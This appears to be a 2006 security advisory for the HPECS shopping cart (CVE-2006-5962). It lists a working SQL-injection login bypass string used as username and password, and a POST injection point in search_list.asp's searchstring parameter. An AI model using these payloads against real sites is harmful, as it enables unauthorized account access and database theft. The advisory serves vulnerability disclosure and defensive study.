
Topic: |
hpecs shopping cart[login bypass & injection sql (post)] |
Credit: |
laurent gaffié & benjamin mossé |
Date: |
2006.11.19 |
CWE: |
N/A |
CVE: |
CVE-2006-5962 (Show details)
Use CVE to see details like: - CVSS2, - Affected Software, - References |

| Risk |
Local |
| Remote |
| Medium |
No |
| Yes |
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
[ ASCII VERSION ]
|